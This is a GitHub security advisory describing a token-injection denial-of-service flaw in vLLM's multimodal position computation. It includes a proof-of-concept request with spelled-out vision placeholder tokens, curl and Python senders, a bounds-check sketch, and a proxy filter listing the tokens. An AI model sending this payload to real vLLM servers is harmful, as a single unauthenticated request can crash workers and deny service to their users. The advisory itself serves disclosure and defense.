GHSA-hpv8-x276-m59f
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
Details
## Summary

This report describes a token injection vulnerability in vLLM’s multimodal processing. Special-token strings spelled out in unauthenticated, text-only prompts are interpreted as control tokens. When image or video placeholder sequences are supplied without matching data, vLLM indexes into empty grids during input-position computation, raising an unhandled IndexError that terminates the worker or degrades availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected.

Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
## Details

- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
  - vllm/model_executor/layers/rotary_embedding.py
    - get_input_positions_tensor(...)
    - _vl_get_input_positions_tensor(...)
- Failure mechanism:
  - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):

```python
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()

    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
```
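The failure mechanism can be reproduced outside vLLM with plain Python lists. The sketch below is illustrative only and is not the upstream code or the upstream fix: the token ids and the helper names `count_placeholders`, `unchecked_lookup`, and `validate_placeholders` are hypothetical, and it simplifies matters by treating each placeholder token as one image or video item. It shows the unchecked lookup failing on an empty grid, and one possible shape for a bounds check that rejects the request with a handled error instead.

```python
from typing import List, Sequence, Tuple

# Hypothetical token ids, chosen only for this illustration.
IMAGE_TOKEN_ID = 1001
VIDEO_TOKEN_ID = 1002

Grid = Sequence[Sequence[int]]  # one (t, h, w) row per supplied image or video


def count_placeholders(input_tokens: Sequence[int], token_id: int) -> int:
    """Count how many times a placeholder token id appears in the prompt."""
    return sum(1 for tok in input_tokens if tok == token_id)


def unchecked_lookup(
    input_tokens: Sequence[int], token_id: int, grid_thw: Grid
) -> List[Tuple[int, int, int]]:
    """Index the grid once per detected placeholder, with no bounds check."""
    dims = []
    for index in range(count_placeholders(input_tokens, token_id)):
        row = grid_thw[index]  # IndexError when the grid has fewer rows
        dims.append((row[0], row[1], row[2]))
    return dims


def validate_placeholders(
    input_tokens: Sequence[int], image_grid_thw: Grid, video_grid_thw: Grid
) -> None:
    """Raise ValueError when placeholders outnumber the supplied grid rows."""
    checks = (
        ("image", IMAGE_TOKEN_ID, image_grid_thw),
        ("video", VIDEO_TOKEN_ID, video_grid_thw),
    )
    for kind, token_id, grid in checks:
        found = count_placeholders(input_tokens, token_id)
        if found > len(grid):
            raise ValueError(
                f"{found} {kind} placeholder(s) in prompt but only "
                f"{len(grid)} {kind} grid row(s) supplied"
            )
```

Running a check of this kind before position computation would turn the crash into a per-request validation error, so a malformed prompt fails on its own without taking the worker down.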
Abbreviated call path:

```
OpenAI API request
  → vllm.v1.engine.core: step/execute_model
  → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
  → vllm.model_executor.layers.rotary_embedding:
      get_input_positions_tensor → _vl_get_input_positions_tensor
  → IndexError: list index out of range
```
## PoC

### Environment

- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:

```bash
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000
```
### Request (text-only, no image/video data)

```bash
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
        }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
```
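For scripted regression testing against a disposable test instance, the same request can be built with the Python standard library. This is a sketch that mirrors the curl command above; the helper names `build_poc_request` and `send` are hypothetical, and the host, port, and model are the ones from the environment section.

```python
import json
import urllib.error
import urllib.request
from typing import Tuple


def build_poc_request(
    base_url: str = "http://127.0.0.1:8000",
    model: str = "Qwen/Qwen2.5-VL-3B-Instruct",
) -> urllib.request.Request:
    """Build the text-only chat request that spells the image placeholder tokens."""
    payload = {
        "model": model,
        "messages": [
            {
                "role": "user",
                "content": [
                    {
                        "type": "text",
                        "text": "what's in picture "
                        "<|vision_start|><|image_pad|><|vision_end|>",
                    }
                ],
            }
        ],
    }
    return urllib.request.Request(
        f"{base_url}/v1/chat/completions",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def send(request: urllib.request.Request, timeout: float = 30.0) -> Tuple[int, str]:
    """Send the request and return (status, body), including for HTTP errors."""
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # An affected server is expected to answer with an error status.
        return err.code, err.read().decode("utf-8", "replace")
```

Calling `send(build_poc_request())` returns the status code and response body, which makes it straightforward to compare behavior before and after upgrading.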
### Observed result

- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
## Impact

- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
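Because the exposure comes from accepting raw user text, a fronting proxy could screen requests for spelled-out placeholder tokens until the server is upgraded. The sketch below is a stopgap illustration, not the upstream fix: the helper names are hypothetical, the token list is taken from the PoC request with `<|video_pad|>` added as an assumption, and other models may use different placeholder strings.

```python
from typing import Any, Dict, Iterator, List, Sequence

# Strings from the PoC request, plus <|video_pad|> (assumed, not from the PoC).
SPECIAL_TOKEN_STRINGS = (
    "<|vision_start|>",
    "<|vision_end|>",
    "<|image_pad|>",
    "<|video_pad|>",
)


def iter_text_parts(messages: Sequence[Dict[str, Any]]) -> Iterator[str]:
    """Yield every user-supplied text fragment from OpenAI-style chat messages."""
    for message in messages:
        content = message.get("content")
        if isinstance(content, str):
            yield content
        elif isinstance(content, list):
            for part in content:
                if isinstance(part, dict) and part.get("type") == "text":
                    yield str(part.get("text", ""))


def find_special_tokens(messages: Sequence[Dict[str, Any]]) -> List[str]:
    """Return the placeholder strings that appear in any text fragment."""
    found: List[str] = []
    for text in iter_text_parts(messages):
        for token in SPECIAL_TOKEN_STRINGS:
            if token in text and token not in found:
                found.append(token)
    return found
```

A proxy could reject any request for which `find_special_tokens` returns a non-empty list, at the cost of also blocking legitimate prompts that merely discuss these strings.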
## Fixes
* Changes associated with https://github.com/vllm-project/vllm/issues/32656
## Credits

- Pengyu Ding (Infra Security, Ant Group)
- Ziteng Xu (Infra Security, Ant Group)